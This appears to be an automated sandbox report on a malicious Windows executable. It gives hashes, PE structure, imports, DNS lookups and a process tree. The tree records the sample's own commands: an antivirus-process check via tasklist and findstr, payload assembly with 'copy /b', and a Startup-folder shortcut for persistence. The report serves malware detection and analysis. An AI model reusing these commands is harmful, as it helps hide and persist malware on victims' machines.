                                              Preview:..[.m....!.U.%....[.-...m.=D...6...(E...&\.....'.x.G~Wp.[.2v....Qo.73..........?F..`.@_...4.!..t.4+..ch..H;...~dd..7.|......@[.."........E....\>...l.#..PEG..L.$.,..[A..k.,.?1A(.aK.&...p...'Q.^....m.}..E..v.)s.f......).h.....}<x........c...q..1\+...k...j..Q.<a.f.3..]US...J.=&.|......1?.. E.ne/..#........}.U_v........%.#...'...D.,...S...u...]...2.-.....l./...%OG.....O.jq...d+.L.(G......4.|...+".XF.G..t...}J.s,....&....zF.y......R....i....3U...|.y..+.}.. .......7.Z.W....6......t..P.m..+..]D^...|.a^...#..`.*...s......z...V8$Z{*.\].GX`.......e..v.@..E^.."k.s..S....gd.16&`........-K...W!....S.X.....5..c...Q..6. ..q$...1;........\u.sws..........i.dva9.L..D#........T.1.K.......E....L...HX......x..........(....nm....*P..#.p.o.q...&..2...a?.IO{]..G.)gQ(...U...:v..Y.a...0.....0..B..F.:.e.j.?v..Ha..<Q...@.i.m..@P\'W...........`.:..R.jMb.-.F..qn...i.".C].z9.....R.O.....W1.=......L.7.....qiR....~........9..I.....S...f6......R....e....".
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):7.997070878978732
                                              Encrypted:true
                                              SSDEEP:1536:8cYTYhic0cJIiMbRTPZBQD3z7nYIDoncF8OZ3ChB:8cYTY8x/OgIsciOuB
                                              MD5:597F565834790C594B894C61459C3DFB
                                              SHA1:D47C91AFE8F194C45055622801148DE7D83A3907
                                              SHA-256:91A36419B02C0BEE19EE66AE6DF90302AC6B64BD15D1DB74BC6682DCC03CBD17
                                              SHA-512:2AFDB76CCAAD9995317F53886B638800743D88B8007D89E47B45706757BBA421A8C1624592E64FFB73520B5BF26D5AC4A68CD2FFE7A4F5E8ED27F943A2DD5AF6
                                              Malicious:true
                                              Preview:,.9...S....~vZ......e.l.c.*.s.2O....$.-.5.`..StW...O.r%Ys.....7~q`=n..,....1....6.Jo"(......X6 ..M..Qb...B>.&.v...d..........y....C...3...;....I..'C.......n..N.4.2oc{l;.!....c.Hr.B.....nJ..\.7.2~....BV.TS3R..C..;...i.4..LQh..+I....Tm..].....(..9&!<.rA.w...(....1.w.qV.[;...hO...z.F(.`..s{.&?....[.5;....d..<.............._.V...,.r....i..u...^&NT..45.;t..C.+..S...;...-..|..S..!..s.N.Q+-C.5.....}L2<.._.m..|nB.....Zb..R.1b$...`..E.6...1..A.g...c.\/S........&E.A .*!....8..a+....T..5yM.z..CP.+..b....i.{q.....9.R.L.!..r..n....T (zI.R..w...f.......k.).7..l.W.~....<..5..N...S....J.....?....93eX.@ ..8..y~.......dGb.q.{.S..J..!@.n.cn......J..U...C....N.M.l...>.|...&.......1.f..)Y.b.._+.....'....v........G.k2.4[...........Q..2Ch....\.Y..Q../.H.O..ts.h...~..=...>~.~.\:....GE'0Y.kn......LU....o..ZJ..).J;..[pmR\..d.c,.3.=.o....g..Y!W-..^z.L.{7.E^9u.{.P.8.j.......T.>.-...m..2..*...N.. ....z...y.]........c....>..%..............3...A.....V+..........=lc.(
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):887994
                                              Entropy (8bit):6.622324410902026
                                              Encrypted:false
                                              SSDEEP:12288:SV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:wxz1JMyyzlohMf1tN70aw8501
                                              MD5:480B699995A5B0B846D54973B83DB3E7
                                              SHA1:92241BB78A7A8769719D0045621C853F628F9495
                                              SHA-256:8615162D4D1718863A131FF5E242884922AA463FE2D6B48BD8CEADD9F519CF5F
                                              SHA-512:83495FC821564E92C90CBDFF7C7F52D6AE6A9367C9845312231E84D0246110E095358EAD78427F4A6AD9A7276D4CEE538C7C753876FA087C8918B24C1CC1A176
                                              Malicious:false
                                              Preview:.}....E.P.3....I..E.M.+..U.E.E.+.E.E.P.6.U..M...p.I..}....E..u.M..}.f..........E...}.f.......E...E...}.f.......E...E...}.f......f..............t(.E.f.........u..........E..+...;............t'.E.f........`u..........E..+...;........U......................... ..R.....@..U..._^[..]....}.f.FX.......f......f.F\f......t_f.F`f......f.Fdf.......E.P.7..4.I....9^Xt=9^\tE.E.P.7....I.9^`......9^d...............{.......}..t..f.E.f.......f.E.f.......U..wL..M..........E....t..AX.E....t..A\.E...~..A`.E...~..Ad]...U..Q..xL.V.u.Wj.....8W................4xL.j.Z.U.;........$xL.....0.........F.;G.............................................}...VW.....~d.......~h.......~D........~P.......>.t..6..<.I..&..u...wL..x.....4xL..U.B.U.;...V....u... .........$..........xL........t.Q........xL..... ....wL.J...wL.;5.xL.u....xL.....xL.........._^..u..5.wL.R....I..%.wL.....xL...t...xL..D...8.u...xL.........]...U.....M...xL.SVW.....wL..u....]......j....E....(.I..{L...t..{L.....}....$xL.......KH
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):93
                                              Entropy (8bit):4.827604747376041
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5xAGNohFMhWlc:HRYF5yjoN723RNUFMr
                                              MD5:7973A84F1A865BCBF0BCFFE16D530DB4
                                              SHA1:3438A33D10CB3BD769A7300DE75149883E61FE67
                                              SHA-256:A025CEBE65C49004A971DC9D0258C293CFAA25E5F151E497021D6F410B376620
                                              SHA-512:BED078255DB647799DD8E9EAACF5EE225110DCF8982214D75BB048A690215BADC3D744633C576553425935711CA6C0F24DA41BDFA15DD1AAC8515548194F4CAC
                                              Malicious:true
                                              Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" ..
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.988870164236672
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:ldqj18tn.exe
                                              File size:1'656'911 bytes
                                              MD5:574ab8397d011243cb52bef069bad2dc
                                              SHA1:1e1cf543bb08113fec19f9d5b9c1df25ed9232f6
                                              SHA256:b376d8b2108027a42534314eb5d82a70b06984c7dca8e91df66d00f5c6e91f20
                                              SHA512:c3e3f7809e5540bdd59a0cd62e0c718aa024355952f7062aac9eb4b7f40009ac97072962f9799a2dd4e2194e7a8d4df8dd4636306ecb7fee6481f6befb684702
                                              SSDEEP:49152:iEVxqQJAyCoZxV/yPHZIQDjLO7MFVrbMwjK:iSxVJA7ofVGHiMjCMFJAwW
                                              TLSH:5375338CF9972D12D68E2BBB613291505BF87D7704B6D4EBD705D81EB23629028CDB23
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                              Icon Hash:c1c0e4ccdcc4c4dc
                                              Entrypoint:0x403883
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:be41bf7b8cc010b614bd36bbca606973
                                              Signature Valid:
                                              Signature Issuer:
                                              Signature Validation Error:
                                              Error Number:
                                              Not Before, Not After
                                                Subject Chain
                                                  Version:
                                                  Thumbprint MD5:
                                                  Thumbprint SHA-1:
                                                  Thumbprint SHA-256:
                                                  Serial:
                                                  Instruction
                                                  sub esp, 000002D4h
                                                  push ebx
                                                  push ebp
                                                  push esi
                                                  push edi
                                                  push 00000020h
                                                  xor ebp, ebp
                                                  pop esi
                                                  mov dword ptr [esp+18h], ebp
                                                  mov dword ptr [esp+10h], 00409268h
                                                  mov dword ptr [esp+14h], ebp
                                                  call dword ptr [00408030h]
                                                  push 00008001h
                                                  call dword ptr [004080B4h]
                                                  push ebp
                                                  call dword ptr [004082C0h]
                                                  push 00000008h
                                                  mov dword ptr [00472EB8h], eax
                                                  call 00007FD26480318Bh
                                                  push ebp
                                                  push 000002B4h
                                                  mov dword ptr [00472DD0h], eax
                                                  lea eax, dword ptr [esp+38h]
                                                  push eax
                                                  push ebp
                                                  push 00409264h
                                                  call dword ptr [00408184h]
                                                  push 0040924Ch
                                                  push 0046ADC0h
                                                  call 00007FD264802E6Dh
                                                  call dword ptr [004080B0h]
                                                  push eax
                                                  mov edi, 004C30A0h
                                                  push edi
                                                  call 00007FD264802E5Bh
                                                  push ebp
                                                  call dword ptr [00408134h]
                                                  cmp word ptr [004C30A0h], 0022h
                                                  mov dword ptr [00472DD8h], eax
                                                  mov eax, edi
                                                  jne 00007FD26480075Ah
                                                  push 00000022h
                                                  pop esi
                                                  mov eax, 004C30A2h
                                                  push esi
                                                  push eax
                                                  call 00007FD264802B31h
                                                  push eax
                                                  call dword ptr [00408260h]
                                                  mov esi, eax
                                                  mov dword ptr [esp+1Ch], esi
                                                  jmp 00007FD2648007E3h
                                                  push 00000020h
                                                  pop ebx
                                                  cmp ax, bx
                                                  jne 00007FD26480075Ah
                                                  add esi, 02h
                                                  cmp word ptr [esi], bx
                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ C ] VS2010 SP1 build 40219
                                                  • [RES] VS2010 SP1 build 40219
                                                  • [LNK] VS2010 SP1 build 40219
                                                   Name                                   Virtual Address  Virtual Size  Is in Section
                                                   IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_IMPORT           0x9b34           0xb4          .rdata
                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE         0xf4000          0x2f3a        .rsrc
                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_SECURITY         0x191be7         0x2868
                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC        0x7a000          0x964         .ndata
                                                   IMAGE_DIRECTORY_ENTRY_DEBUG            0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_IAT              0x8000           0x2d0         .rdata
                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0              0x0
                                                   IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0
                                                   Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
                                                   .text   0x1000           0x6dae        0x6e00    00499a6f70259150109c809d6aa0e6ed  False     0.6611150568181818  data       6.508529563136936   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                   .rdata  0x8000           0x2a62        0x2c00    07990aaa54c3bc638bb87a87f3fb13e3  False     0.3526278409090909  data       4.390535020989255   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   .data   0xb000           0x67ebc       0x200     014871d9a00f0e0c8c2a7cd25606c453  False     0.203125            data       1.4308602597540492  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                   .ndata  0x73000          0x81000       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                   .rsrc   0xf4000          0x2f3a        0x3000    c15fab2d5ae919ed0bc47dbc7b92bcf1  False     0.5292154947916666  data       5.37146345911248    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   .reloc  0xf7000          0xf32         0x1000    c37dbd85adbacba5815fd64300b19e35  False     0.5908203125        data       5.4190090723243225  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                   Name           RVA      Size    Type                                                                                Language  Country        ZLIB Complexity
                                                   RT_ICON        0xf41d8  0x2668  Device independent bitmap graphic, 48 x 96 x 32, image size 9792                    English   United States  0.5450569568755086
                                                   RT_DIALOG      0xf6840  0x100   data                                                                                English   United States  0.5234375
                                                   RT_DIALOG      0xf6940  0x11c   data                                                                                English   United States  0.6056338028169014
                                                   RT_DIALOG      0xf6a5c  0x60    data                                                                                English   United States  0.7291666666666666
                                                   RT_GROUP_ICON  0xf6abc  0x14    data                                                                                English   United States  1.1
                                                   RT_VERSION     0xf6ad0  0x194   OpenPGP Secret Key                                                                  English   United States  0.5693069306930693
                                                   RT_MANIFEST    0xf6c64  0x2d6   XML 1.0 document, ASCII text, with very long lines (726), with no line terminators  English   United States  0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 14:51:05.298547983 CET | 59959 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 14:51:05.436534882 CET | 53 | 59959 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 14:51:19.427958965 CET | 56572 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 14:51:19.565439939 CET | 53 | 56572 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 14:51:05.298547983 CET | 192.168.2.6 | 1.1.1.1 | 0xb97c | Standard query (0) | zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:51:19.427958965 CET | 192.168.2.6 | 1.1.1.1 | 0x9815 | Standard query (0) | zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 14:51:05.436534882 CET | 1.1.1.1 | 192.168.2.6 | 0xb97c | Name error (3) | zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 14:51:19.565439939 CET | 1.1.1.1 | 192.168.2.6 | 0x9815 | Name error (3) | zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq | none | none | A (IP address) | IN (0x0001) | false


                                                  Target ID:0
                                                  Start time:08:50:57
                                                  Start date:18/12/2024
                                                  Path:C:\Users\user\Desktop\ldqj18tn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\ldqj18tn.exe"
                                                  Imagebase:0x400000
                                                  File size:1'656'911 bytes
                                                  MD5 hash:574AB8397D011243CB52BEF069BAD2DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:08:51:00
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:08:51:00
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:08:51:01
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:tasklist
                                                  Imagebase:0x550000
                                                  File size:79'360 bytes
                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:08:51:01
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /I "wrsa opssvc"
                                                  Imagebase:0xd90000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:08:51:02
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:tasklist
                                                  Imagebase:0x550000
                                                  File size:79'360 bytes
                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:08:51:02
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                  Imagebase:0xd90000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c md 704579
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /V "MARTNMSPIDERRINGTONE" Mh
                                                  Imagebase:0xd90000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                  Wow64 process (32bit):true
                                                  Commandline:Organizational.pif u
                                                  Imagebase:0xef0000
                                                  File size:893'608 bytes
                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 8%, ReversingLabs
                                                  Has exited:false

                                                  Target ID:12
                                                  Start time:08:51:03
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:choice /d y /t 5
                                                  Imagebase:0xea0000
                                                  File size:28'160 bytes
                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:08:51:04
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:08:51:04
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:08:51:15
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js"
                                                  Imagebase:0x7ff7b4620000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:08:51:15
                                                  Start date:18/12/2024
                                                  Path:C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
                                                  Imagebase:0xd70000
                                                  File size:893'608 bytes
                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 8%, ReversingLabs
                                                  Has exited:false


                                                    Execution Graph

                                                    Execution Coverage:17.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:20.7%
                                                    Total number of Nodes:1526
                                                    Total number of Limit Nodes:33
GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 